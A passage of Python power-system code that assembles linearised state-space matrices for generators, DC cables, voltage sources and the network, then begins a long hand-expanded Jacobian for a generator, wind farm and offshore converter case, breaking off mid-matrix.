# B_tilde[model.x_ind:model.x_ind+model.nx,inw:] = bacvsc@cn[bus_idx:bus_idx+2] # XXX alternative way
# if not model.x_dc == -1:
# B_tilde[model.x_ind:model.x_ind+model.nx,[model.x_dc]]=bdcvsc
# n_vsc += 1
elif model.type == ModelType.GEN_ORD_6:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = sixth_order_model_avr(xo, uo, model)
# A_tilde[model.x_ind:model.x_ind+model.nx,model.x_ind:model.x_ind+model.nx]=ag
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bg
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dg
# C_tilde[idx:idx+2,model.x_ind:model.x_ind+model.nx] = bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@cg
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
# n_gen += 1
elif model.type == ModelType.GEN_2_2:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = standard_model_linear(xo, uo, model)
# A_tilde[model.x_ind:model.x_ind+model.nx,model.x_ind:model.x_ind+model.nx]=ag
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bg
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dg
# C_tilde[idx:idx+2,model.x_ind:model.x_ind+model.nx] = bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@cg
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
# n_gen += 1
# print(model,cg@xo)
elif model.type == ModelType.DC_LINE:
# break
mf = models[model.f]
mt = models[model.t]
If = -x0[mf.x_ind + mf.x_idx['Idc']] * mf.Sn / npr.Sb
            It = x0[mt.x_ind + mt.x_idx['Idc']] * mt.Sn / npr.Sb  # overwritten just below
It = -If # TODO check the initialization. In steady state If=-It (if G=0)
uo = np.array([If, It])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = dc_cable_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
# cvsc[np.array([0,1]),np.array([mf.x_idx['Idc'],mt.x_idx['Idc']])]
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bcb
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dcb
cm = np.zeros((1, mf.nx))
cm[0, mf.x_idx['Idc']] = 1
C_tilde[model.x_ind:model.x_ind + model.nx, mf.x_ind:mf.x_ind + mf.nx] = bm[:, [0]] @ cm
C_tilde[model.x_ind:model.x_ind + model.nx, mt.x_ind:mt.x_ind + mt.nx] = bm[:, [1]] @ cm
elif model.type == ModelType.VS:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
uo = np.array([vx, vy])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = vs_linear(xo, uo, model)
# A_tilde[model.x_ind:model.x_ind+model.nx,model.x_ind:model.x_ind+model.nx]=avs
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bvs
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dvs
# C_tilde[idx:idx+2,model.x_ind:model.x_ind+model.nx] = bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@cvs
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
an, bn, cn, dn = network_linear(npr)
    # Bus current injections are reconstructed here only to support the
    # commented consistency checks below; they do not enter Amat.
    Im = np.zeros(2 * npr.n_bus)
Ib = np.zeros(npr.n_bus, dtype=complex)
for model in models:
if model.type == ModelType.gen_standard:
th = x0[model.x_ind + model.x_idx['d']]
else:
th = x0[model.x_ind + model.x_idx['Theta']]
Id = x0[model.x_ind + model.x_idx['Id']]
Iq = x0[model.x_ind + model.x_idx['Iq']]
Ix = (Id * np.cos(th) - Iq * np.sin(th)) * model.Sn / npr.Sb
Iy = (Id * np.sin(th) + Iq * np.cos(th)) * model.Sn / npr.Sb
Im[2 * model.bus_ind] += Ix
Im[2 * model.bus_ind + 1] += Iy
Ib[model.bus_ind] += Ix + 1j * Iy
# xm = x0[:inw]
# xn = x0[inw:]
# cn@xn+dn@Im
# cn@xn+dn@(C_tilde@xm+D_tilde@xn)
# C_tilde@xm-Im
Amat = np.vstack([np.hstack([A_tilde, B_tilde @ cn]),
np.hstack([bn @ C_tilde, an + bn @ D_tilde])])
return Amat
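# The block assembly above corresponds to
#   Amat = [[ A_tilde,      B_tilde @ cn      ],
#           [ bn @ C_tilde, an + bn @ D_tilde ]]
# with model states in the first block row and network states in the second,
# coupled through the network input (bn) and output (cn) matrices.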
def nswph_linear(x0, u, npr, off, wf, gpr):
delta = x0[gpr.x_idx['d']]
e_dpp = x0[gpr.x_idx['Edpp']]
e_qpp = x0[gpr.x_idx['Eqpp']]
Idw = x0[gpr.nx + wf.x_idx['Id']]
Iqw = x0[gpr.nx + wf.x_idx['Iq']]
thetaw = x0[gpr.nx + wf.x_idx['Theta']]
# Mpll = x0[7]
# ilx = x0[12]
# ily = x0[13]
# vd = x0[14]
# vq = x0[15]
Ido = x0[gpr.nx + wf.nx + off.x_idx['Id']]
Iqo = x0[gpr.nx + wf.nx + off.x_idx['Iq']]
thetao = x0[gpr.nx + wf.nx + off.x_idx['Theta']]
inw = npr.x_ind
voffx = x0[inw + 0]
voffy = x0[inw + 1]
vscx = x0[inw + 2]
vscy = x0[inw + 3]
vtfwx = x0[inw + 4]
vtfwy = x0[inw + 5]
vwfx = x0[inw + 6]
vwfy = x0[inw + 7]
    # Hard-coded per-unit network parameters for this NSWPH case; the dense A
    # matrix below is an expanded closed-form Jacobian of the combined
    # generator / wind-farm / offshore-converter model.
    Csc = 0.01
Chub = 0.01
Lcb = 0.002103529614325069
Rcb = 0.0014730639731404956
Ccb = 0.4269650611647936 / 2
Ltsc = 0.15 / 3
Rtsc = 0.01 / 3
Ltwf = 0.15 / 8
Rtwf = 0.01 / 8
A = np.array([[0, npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[(-gpr.ra * ((-2 * gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - 2 * gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * (-gpr.ra * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + (-2 * gpr.ra * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) + 2 * gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta))) * (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - (
-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * (
vscx * np.cos(delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (
-vscx * np.sin(delta) + vscy * np.cos(delta))) * (
-vscx * np.sin(delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) * (
-vscx * np.sin(delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta))) * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, -gpr.D / gpr.Tj, 0, (-gpr.ra * (
2 * gpr.ra * (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + 2 * gpr.xqpp * (-gpr.ra * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - gpr.ra * (-vscx * np.sin(
delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - gpr.xqpp * (vscx * np.cos(
delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, 0, (-gpr.ra * (
2 * gpr.ra * (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 - 2 * gpr.xdpp * (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - gpr.ra * (vscx * np.cos(
delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (-gpr.ra * ((
-gpr.ra * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) * (
-2 * gpr.ra * np.cos(
delta) + 2 * gpr.xqpp * np.sin(
delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + (
-gpr.ra * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta))) * (
2 * gpr.ra * np.sin(
delta) + 2 * gpr.xdpp * np.cos(
delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - (
-gpr.ra * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) * np.cos(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(delta))) * np.sin(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(
delta)) * (-vscx * np.sin(delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.cos(
delta) + gpr.xqpp * np.sin(
delta)) * (
vscx * np.cos(
delta) + vscy * np.sin(
delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj,
(-gpr.ra * ((-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) * (
-2 * gpr.ra * np.sin(delta) - 2 * gpr.xqpp * np.cos(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta))) * (
-2 * gpr.ra * np.cos(delta) + 2 * gpr.xdpp * np.sin(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta))) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) * (
vscx * np.cos(delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) * (
-vscx * np.sin(delta) + vscy * np.cos(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -gpr.kd / gpr.Tdp, (gpr.kd - 1) / gpr.Tdp, 0, 0, 1 / gpr.Tdp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-(gpr.xdp - gpr.xdpp) * (-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) / (
gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 1 / gpr.Tdpp,
(-gpr.xqpp * (gpr.xdp - gpr.xdpp) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - 1) / gpr.Tdpp, 0,
-gpr.ra * (gpr.xdp - gpr.xdpp) / (gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-(gpr.xdp - gpr.xdpp) * (-gpr.ra * np.cos(delta) + gpr.xqpp * np.sin(delta)) / (
gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)),
-(gpr.xdp - gpr.xdpp) * (-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) / (
gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.kq / gpr.Tqp, (gpr.kq - 1) / gpr.Tqp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[(gpr.xqp - gpr.xqpp) * (-gpr.ra * (-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (
-vscx * np.sin(delta) + vscy * np.cos(delta))) / (
gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0,
gpr.ra * (gpr.xqp - gpr.xqpp) / (gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 1 / gpr.Tqpp,
(-gpr.xdpp * (gpr.xqp - gpr.xqpp) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - 1) / gpr.Tqpp, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(gpr.xqp - gpr.xqpp) * (gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(delta)) / (
gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)),
(gpr.xqp - gpr.xqpp) * (-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) / (
gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te), 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0],
[0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, vscx / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)),
vscy / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0, npr.wn * wf.Kic / wf.Lt, 0,
npr.wn / wf.Lt, 0, npr.wn * (
vwfx * np.sin(thetaw) - vwfy * np.cos(thetaw) - wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Lt,
-npr.wn * wf.Ki_pll * wf.Kpc * wf.Kpf * wf.Kpp / wf.Lt, npr.wn * wf.Kif * wf.Kpc * wf.Kpp / wf.Lt,
npr.wn * wf.Kip * wf.Kpc / wf.Lt, 0, -npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.sin(thetaw) - np.cos(thetaw)) / wf.Lt,
npr.wn * (-wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.cos(thetaw) - np.sin(thetaw)) / wf.Lt, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0, npr.wn * wf.Kic / wf.Lt, 0,
npr.wn / wf.Lt, npr.wn * (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Lt, 0, 0, 0,
npr.wn * wf.Kiq * wf.Kpc / wf.Lt, 0, npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt,
npr.wn * wf.Kpc * wf.Kpq * wf.Kv / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * np.sin(thetaw) / wf.Lt, -npr.wn * np.cos(thetaw) / wf.Lt, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * wf.Kpp * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)),
-wf.Ki_pll * wf.Kpf * wf.Kpp, wf.Kif * wf.Kpp, wf.Kip, 0, -wf.Kpp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * wf.Kpf * wf.Kpp * np.sin(thetaw),
-wf.Kp_pll * wf.Kpf * wf.Kpp * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kiq, 0, wf.Kpq * wf.Kq, wf.Kpq * wf.Kv,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad, 0,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, np.cos(thetaw) / wf.Tad, np.sin(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw) / wf.Tad, np.cos(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), npr.wn * wf.Ki_pll, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-npr.wn * wf.Kp_pll * np.sin(thetaw), npr.wn * wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw), 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw),
np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * np.sin(thetaw),
-wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll * wf.Kpf, wf.Kif,
0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
wf.Kp_pll * wf.Kpf * np.sin(thetaw), -wf.Kp_pll * wf.Kpf * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kq, wf.Kv, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Tpm,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) + Iqw * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Tpm, 0, 0, 0, 0, -1 / wf.Tpm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm,
(Idw * np.sin(thetaw) + Iqw * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) - Iqw * (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw))) / wf.Tpm, 0, 0, 0, 0, 0,
-1 / wf.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / wf.Tpm,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * vwfx * np.sin(thetaw) + 2 * vwfy * np.cos(thetaw)) * (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / 2 + (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * (
-2 * vwfx * np.cos(thetaw) - 2 * vwfy * np.sin(thetaw)) / 2) / (
wf.Tvm * np.sqrt((-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0, -1 / wf.Tvm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
-(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.sin(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.cos(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), (
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.cos(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.sin(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt, 0,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao)) + voffx * np.sin(
thetao) - voffy * np.cos(thetao)) / off.Lt,
-npr.wn * off.Ki_pll * off.Kpc * off.Kpf * off.Kpp / off.Lt,
